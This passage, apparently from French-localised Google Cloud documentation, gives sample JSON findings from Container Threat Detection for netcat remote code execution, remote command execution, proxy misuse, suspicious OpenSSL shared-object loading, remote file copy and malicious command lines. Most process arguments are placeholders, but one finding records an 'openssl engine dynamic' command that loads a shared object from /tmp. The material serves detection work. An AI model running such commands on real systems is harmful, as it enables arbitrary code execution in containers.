"1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-netcat-remote-code-execution-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_netcat_remote_code_execution_in_container" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1059/004/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection" } ], "relatedFindingUri": {} } }, }
Exécution : exécution de commande à distance possible détectée (aperçu)
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Possible Remote Command Execution Detected", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "COMMAND_AND_SCRIPTING_INTERPRETER" ], "additionalTactics": [ "COMMAND_AND_CONTROL" ], "additionalTechniques": [ "MULTI_STAGE_CHANNELS" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-remote-cmd-exec-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_possible_remote_command_execution_detected" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1059/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c/detection" } ], "relatedFindingUri": {} } }, }
Exécution : exécution d'un programme avec un environnement de proxy HTTP non autorisé
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Program Run with Disallowed HTTP Proxy Env", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-program-with-http-proxy-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" }, { "name": "\"HTTP_PROXY\"", "val": "\"http://localhost:8080\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_program_run_with_disallowed_http_proxy_env" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1204/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/f3bf59164816762430e8cdf5a5d64b4284a86af86245a52067c533c8cd98f215/detection" } ], "relatedFindingUri": {} } }, }
Exécution : Objet partagé OpenSSL suspect chargé
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Suspicious OpenSSL Shared Object Loaded", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "SHARED_MODULES" ], "additionalTactics": [ "PERSISTENCE" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/usr/bin/openssl\"", "size": "736792", "sha256": "d3738c5257ede884644c633582fae65705399e0dd7e2dee70c4ecbba7af73469", "hashedSize": "736792", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"openssl\"", "\"engine\"", "\"dynamic\"", "\"-pre\"", "\"SO_PATH:/tmp/libfoo.so\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_suspicious_openssl_shared_object_loaded" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0002/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/d3738c5257ede884644c633582fae65705399e0dd7e2dee70c4ecbba7af73469/detection" } ], "relatedFindingUri": {} } }, }
Exfiltration : lancer des outils de copie de fichiers à distance dans un conteneur
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Exfiltration: Launch Remote File Copy Tools in Container", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-launch-remote-file-copy-tools-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_launch_remote_file_copy_tools_in_container" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1020/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/f3bf59164816762430e8cdf5a5d64b4284a86af86245a52067c533c8cd98f215/detection" } ], "relatedFindingUri": {} } }, }
Impact : Détecter les lignes de commande malveillantes (bêta)
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Impact: Detect Malicious Cmdlines", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "DATA_DESTRUCTION" ], "additionalTactics": [ "IMPACT" ], "additionalTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-detect-malicious-cmdlines-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": 